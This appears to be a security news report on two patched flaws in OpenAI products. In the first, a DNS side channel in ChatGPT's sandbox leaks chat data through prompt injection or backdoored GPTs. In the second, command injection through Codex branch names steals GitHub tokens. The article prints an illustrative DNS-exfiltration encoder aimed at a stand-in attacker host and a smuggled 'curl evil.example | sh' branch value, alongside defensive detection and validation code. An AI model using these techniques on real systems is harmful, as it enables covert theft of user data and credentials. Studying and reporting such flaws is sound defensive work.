OpenAI Patches ChatGPT Data Exfiltration Flaw and Codex GitHub Token Vulnerability

A previously unknown vulnerability in OpenAI's ChatGPT allowed sensitive chat data to be extracted without the user's knowledge or consent, according to new findings from Check Point.

“One malicious prompt can turn a normal conversation into a channel for hidden surveillance, silently leaking user messages, uploaded files, and other sensitive content,” the cybersecurity company said in a report published today. “A backdoored GPT can exploit the same vulnerability to gain access to user data without the user’s knowledge or consent.”

After responsible disclosure, OpenAI addressed the issue on February 20, 2026. There is no evidence that this issue was ever exploited in a malicious manner.

Although ChatGPT is built with various security mechanisms to prevent unauthorized data sharing and outgoing network requests, the newly discovered vulnerability bypasses these protections entirely by using a side channel in the Linux runtime that the artificial intelligence (AI) agent uses to write code and analyze data.

In particular, it abuses DNS as a covert transport, encoding information in DNS queries to slip past the sandbox's network restrictions. The same hidden communication channel can also be used to establish a reverse shell inside the Linux runtime and achieve remote command execution.
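To illustrate the general class of technique (not Check Point's actual exploit code), the hypothetical Python sketch below shows how data can be smuggled out through DNS lookups alone: the payload is base32-encoded into subdomain labels of an attacker-controlled domain, so merely resolving those names leaks the data to whoever runs that domain's nameserver. `attacker.example` and both function names are illustrative assumptions.

```python
import base64

# Hypothetical attacker-controlled domain; all names here are illustrative.
EXFIL_DOMAIN = "attacker.example"
CHUNK = 60  # DNS labels max out at 63 bytes; leave room for a sequence prefix

def encode_for_dns(secret: bytes) -> list[str]:
    """Turn data into DNS hostnames. Even if a sandbox blocks HTTP egress,
    resolving these names leaks the payload to the authoritative
    nameserver for EXFIL_DOMAIN."""
    # Base32 survives DNS case-folding, unlike base64.
    encoded = base64.b32encode(secret).decode().rstrip("=")
    chunks = [encoded[i:i + CHUNK] for i in range(0, len(encoded), CHUNK)]
    # One query per chunk, numbered so the receiver can reassemble in order.
    return [f"{n}-{c}.{EXFIL_DOMAIN}".lower() for n, c in enumerate(chunks)]

def decode_from_dns(queries: list[str]) -> bytes:
    """What the attacker's nameserver does with the queries it observes."""
    chunks = {}
    for q in queries:
        seq, chunk = q.split(".")[0].split("-", 1)
        chunks[int(seq)] = chunk.upper()
    encoded = "".join(chunks[i] for i in sorted(chunks))
    encoded += "=" * (-len(encoded) % 8)  # restore base32 padding
    return base64.b32decode(encoded)
```

Because DNS resolution is often permitted even in otherwise locked-down environments, this path can evade egress controls that only inspect HTTP traffic.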

In the absence of any warning or confirmation prompt for the user, the vulnerability creates a security blind spot: the AI system assumes the environment is isolated when it is not.

As an illustrative example, an attacker could convince a user to paste malicious instructions by passing them off as a way to unlock premium features for free or improve ChatGPT's functionality. The threat grows when the attack is embedded within a custom GPT, since the malicious logic can be baked into the GPT itself rather than relying on tricking the user into pasting specially crafted input.

“Importantly, because the model was operating under the assumption that the sandbox could not export data directly, it did not recognize that behavior as an external data transfer requiring refusal or user intervention,” Check Point explained. “As a result, the leak did not trigger warnings about data leaving the conversation, did not require explicit user authorization, and remained largely invisible from the user’s perspective.”

With tools like ChatGPT increasingly embedded in business environments and users uploading highly personal information, vulnerabilities like this underscore the need for organizations to deploy their own security layer to resist prompt injections and other unpredictable behavior in AI systems.
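One such defensive layer could monitor egress from AI sandboxes for DNS names that look like encoded payloads. The heuristic below is only a sketch (the function names and thresholds are assumptions, not a product feature): it flags long, high-entropy leftmost labels, a common signature of DNS exfiltration.

```python
import math
from collections import Counter

def shannon_entropy(s: str) -> float:
    """Bits of entropy per character; encoded data scores high,
    ordinary hostnames like 'www' or 'mail' score low."""
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())

def looks_like_exfil(hostname: str,
                     min_len: int = 24,
                     min_entropy: float = 3.5) -> bool:
    """Flag DNS names whose leftmost label is long and high-entropy.
    Thresholds are illustrative and would need tuning in practice."""
    label = hostname.split(".")[0]
    if len(label) < min_len:
        return False
    return shannon_entropy(label) >= min_entropy
```

A heuristic like this inevitably produces false positives (CDN hostnames, for example), so it is better suited to alerting than to hard blocking.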

“This research reinforces a stark truth of the AI era: don’t assume AI tools are automatically secure,” said Eli Smadja, head of research at Check Point Research, in a statement shared with The Hacker News.

“As AI platforms evolve into full computing environments that handle our most sensitive data, traditional security controls are no longer sufficient on their own. Organizations need independent visibility and layered protection between themselves and AI vendors. That’s how we move forward safely — by rethinking the AI security architecture, not reacting to the next incident.”

The development comes as malicious actors have been observed publishing web browser extensions (or updating existing ones) that engage in the dubious practice of scraping AI chatbot conversations without user consent, highlighting how seemingly harmless add-ons can become a channel for data harvesting.

“It goes almost without saying that these extensions open the door to several risks, including identity theft, targeted phishing campaigns, and sensitive data being sold on underground platforms,” said Expel researcher Ben Nahorney. “In organizations where employees may inadvertently install these extensions, they could expose intellectual property, customer data, or other confidential information.”

Command Injection Vulnerability in OpenAI Codex Leads to GitHub Token Compromise

The findings also coincide with the discovery of a command injection vulnerability in OpenAI’s Codex, a cloud-based software engineering agent, which could have been exploited to steal GitHub authentication data and ultimately compromise other users of a shared repository.

“The vulnerability exists within the HTTP request used to create a task, which allows an attacker to smuggle arbitrary commands via the GitHub branch name parameter,” said BeyondTrust Phantom Labs researcher Tyler Jespersen in a report shared with The Hacker News. “This can lead to the theft of the victim’s GitHub user access token – the same token that Codex uses to authenticate with GitHub.”

The problem, according to BeyondTrust, stems from improper sanitization when processing GitHub branch names during cloud task execution. Because of this flaw, an attacker can inject arbitrary commands via the branch name parameter in an HTTPS POST request to the Codex API backend, execute a malicious payload inside the agent's container, and exfiltrate sensitive authentication tokens.
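The report does not publish the vulnerable code, but the class of bug is easy to sketch. In this hypothetical Python example (function names and the allowlist pattern are illustrative assumptions, not Codex internals), interpolating an attacker-controlled branch name into a shell command enables injection, while passing an argv list with a conservative allowlist does not.

```python
import re
import subprocess

# Conservative allowlist (illustrative): letters, digits, ., _, /, -;
# the first character may not be "-", so the value can't masquerade as a flag.
SAFE_BRANCH = re.compile(r"[A-Za-z0-9._/][A-Za-z0-9._/-]*")

def checkout_branch_vulnerable(branch: str) -> None:
    # VULNERABLE sketch (do not use): the branch name is interpolated into
    # a shell command, so a value like "x; curl evil.example | sh"
    # terminates the git invocation and runs attacker commands.
    subprocess.run(f"git checkout {branch}", shell=True, check=True)

def checkout_branch_safer(branch: str) -> None:
    # Safer: argv list (no shell parsing of the value) plus an allowlist,
    # so metacharacters never reach a shell and flags are rejected.
    if not SAFE_BRANCH.fullmatch(branch):
        raise ValueError(f"rejected branch name: {branch!r}")
    subprocess.run(["git", "checkout", branch], check=True)
```

The key design choice is to treat the branch name as data rather than code: the argv form hands it to `git` as a single argument, and the allowlist rejects anything a shell (or git's own option parser) could reinterpret.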

“This allowed for cross-platform, read/write access to the victim’s entire codebase,” said Kinnaird McQuade, senior security architect at BeyondTrust, in a post on X. The issue was patched by OpenAI as of February 5, 2026, after being reported on December 16, 2025, and affected Codex web, the Codex CLI, and the Codex IDE extension.

The cybersecurity vendor said the branch-based command injection method can be extended to steal access tokens for GitHub App installations and execute bash commands in the code review container whenever @codex is mentioned on GitHub.

“After pushing the malicious branch, we mentioned Codex in a pull request (PR) comment,” the researcher explained. “Codex then spins up a code review container, runs a job against our repository and branch, executes our payload, and forwards the response to our external server.”
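The sanitization failure at the root of this chain can be made concrete. The sketch below approximates a subset of git's own `check-ref-format` rules in Python; it is illustrative only, not a substitute for delegating the check to `git check-ref-format --branch` itself.

```python
import re

# Characters git forbids in ref names: control characters, space, DEL,
# and the punctuation ~ ^ : ? * [ \  (approximate subset of the rules).
_FORBIDDEN = re.compile(r"[\x00-\x20\x7f~^:?*\[\\]")

def is_valid_branch_name(name: str) -> bool:
    """Reject branch names git itself would refuse (approximation)."""
    if not name or name in {"@", "HEAD"}:
        return False
    if _FORBIDDEN.search(name):
        return False  # shell metacharacters like space and ; fail here too
    if ".." in name or "@{" in name or "//" in name:
        return False
    if name.startswith(("/", ".", "-")) or name.endswith(("/", ".", ".lock")):
        return False
    return True
```

Validating against git's own grammar before the name ever reaches a command line would have rejected injection payloads outright, since they necessarily contain characters no legal ref name can carry.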

The research also highlights the growing risk that the privileged access granted to AI coding agents can be leveraged to open an attack surface on business systems without triggering traditional security controls.

“As AI agents become more deeply integrated into a developer’s workflow, the security of the containers they run in — and the inputs they use — must be treated as rigorously as any other application security boundary,” BeyondTrust said. “The attack surface is expanding, and the security of these environments must keep pace.”
